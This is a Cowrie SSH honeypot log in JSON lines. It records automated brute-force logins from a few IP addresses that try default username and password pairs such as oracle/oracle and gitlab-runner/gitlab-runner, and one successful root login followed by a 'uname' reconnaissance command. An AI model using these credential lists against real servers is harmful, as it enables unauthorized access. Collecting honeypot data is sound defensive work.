{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:06.034564Z","src_ip":"212.227.125.160","session":"1fef00f060f2"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:06.620742Z","src_ip":"212.227.125.160","session":"1fef00f060f2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:07.673670Z","src_ip":"212.227.125.160","session":"1fef00f060f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33170,"dst_ip":"1.2.3.4","dst_port":22,"session":"a86fe65cf5a7","protocol":"ssh","message":"New connection: 212.227.125.160:33170 (1.2.3.4:22) [session: a86fe65cf5a7]","sensor":"my-vps","timestamp":"2025-08-26T11:23:12.579231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:12.580118Z","src_ip":"212.227.125.160","session":"a86fe65cf5a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:12.639230Z","src_ip":"212.227.125.160","session":"a86fe65cf5a7"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:12.824559Z","src_ip":"212.227.125.160","session":"a86fe65cf5a7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:13.885948Z","src_ip":"212.227.125.160","session":"a86fe65cf5a7"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56846,"dst_ip":"1.2.3.4","dst_port":22,"session":"817511fbf5fe","protocol":"ssh","message":"New connection: 83.168.105.65:56846 (1.2.3.4:22) [session: 817511fbf5fe]","sensor":"my-vps","timestamp":"2025-08-26T11:23:18.600094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:18.601585Z","src_ip":"83.168.105.65","session":"817511fbf5fe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:18.640698Z","src_ip":"83.168.105.65","session":"817511fbf5fe"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:18.760010Z","src_ip":"83.168.105.65","session":"817511fbf5fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33944,"dst_ip":"1.2.3.4","dst_port":22,"session":"c03c5c9aa14a","protocol":"ssh","message":"New connection: 212.227.125.160:33944 (1.2.3.4:22) [session: c03c5c9aa14a]","sensor":"my-vps","timestamp":"2025-08-26T11:23:19.431962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:19.692615Z","src_ip":"212.227.125.160","session":"c03c5c9aa14a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:19.693315Z","src_ip":"212.227.125.160","session":"c03c5c9aa14a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:19.800468Z","src_ip":"83.168.105.65","session":"817511fbf5fe"}
{"eventid":"cowrie.login.failed","username":"titu","password":"titu","message":"login attempt [titu/titu] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:20.024868Z","src_ip":"212.227.125.160","session":"c03c5c9aa14a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:21.089999Z","src_ip":"212.227.125.160","session":"c03c5c9aa14a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34710,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b2b650ff58e","protocol":"ssh","message":"New connection: 212.227.125.160:34710 (1.2.3.4:22) [session: 7b2b650ff58e]","sensor":"my-vps","timestamp":"2025-08-26T11:23:24.412676Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:24.413811Z","src_ip":"212.227.125.160","session":"7b2b650ff58e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:24.462966Z","src_ip":"212.227.125.160","session":"7b2b650ff58e"}
{"eventid":"cowrie.login.failed","username":"packer","password":"packer","message":"login attempt [packer/packer] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:24.669257Z","src_ip":"212.227.125.160","session":"7b2b650ff58e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:25.722367Z","src_ip":"212.227.125.160","session":"7b2b650ff58e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35486,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdefcd1ddb98","protocol":"ssh","message":"New connection: 212.227.125.160:35486 (1.2.3.4:22) [session: cdefcd1ddb98]","sensor":"my-vps","timestamp":"2025-08-26T11:23:30.200834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:30.202863Z","src_ip":"212.227.125.160","session":"cdefcd1ddb98"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:30.254889Z","src_ip":"212.227.125.160","session":"cdefcd1ddb98"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:23:30.472027Z","src_ip":"212.227.125.160","session":"cdefcd1ddb98"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:23:30.633712Z","src_ip":"212.227.125.160","session":"cdefcd1ddb98"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:23:30.634382Z","src_ip":"212.227.125.160","session":"cdefcd1ddb98"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:30.686469Z","src_ip":"212.227.125.160","session":"cdefcd1ddb98"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:30.687530Z","src_ip":"212.227.125.160","session":"cdefcd1ddb98"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33558,"dst_ip":"1.2.3.4","dst_port":22,"session":"edf90b25329a","protocol":"ssh","message":"New connection: 83.168.105.65:33558 (1.2.3.4:22) [session: edf90b25329a]","sensor":"my-vps","timestamp":"2025-08-26T11:23:34.064016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:34.065379Z","src_ip":"83.168.105.65","session":"edf90b25329a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:34.102596Z","src_ip":"83.168.105.65","session":"edf90b25329a"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:34.216541Z","src_ip":"83.168.105.65","session":"edf90b25329a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:35.255633Z","src_ip":"83.168.105.65","session":"edf90b25329a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36250,"dst_ip":"1.2.3.4","dst_port":22,"session":"51375554f0b0","protocol":"ssh","message":"New connection: 212.227.125.160:36250 (1.2.3.4:22) [session: 51375554f0b0]","sensor":"my-vps","timestamp":"2025-08-26T11:23:36.078686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:36.079454Z","src_ip":"212.227.125.160","session":"51375554f0b0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:36.129723Z","src_ip":"212.227.125.160","session":"51375554f0b0"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:36.297109Z","src_ip":"212.227.125.160","session":"51375554f0b0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:37.351556Z","src_ip":"212.227.125.160","session":"51375554f0b0"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":33738,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a3dd11c214b","protocol":"ssh","message":"New connection: 196.251.86.249:33738 (1.2.3.4:22) [session: 2a3dd11c214b]","sensor":"my-vps","timestamp":"2025-08-26T11:23:39.585884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:40.334718Z","src_ip":"196.251.86.249","session":"2a3dd11c214b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:23:40.335419Z","src_ip":"196.251.86.249","session":"2a3dd11c214b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37020,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad2cefb46e9c","protocol":"ssh","message":"New connection: 212.227.125.160:37020 (1.2.3.4:22) [session: ad2cefb46e9c]","sensor":"my-vps","timestamp":"2025-08-26T11:23:42.052794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:42.053633Z","src_ip":"212.227.125.160","session":"ad2cefb46e9c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:42.104069Z","src_ip":"212.227.125.160","session":"ad2cefb46e9c"}
{"eventid":"cowrie.login.failed","username":"irc","password":"irc","message":"login attempt [irc/irc] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:42.276449Z","src_ip":"212.227.125.160","session":"ad2cefb46e9c"}
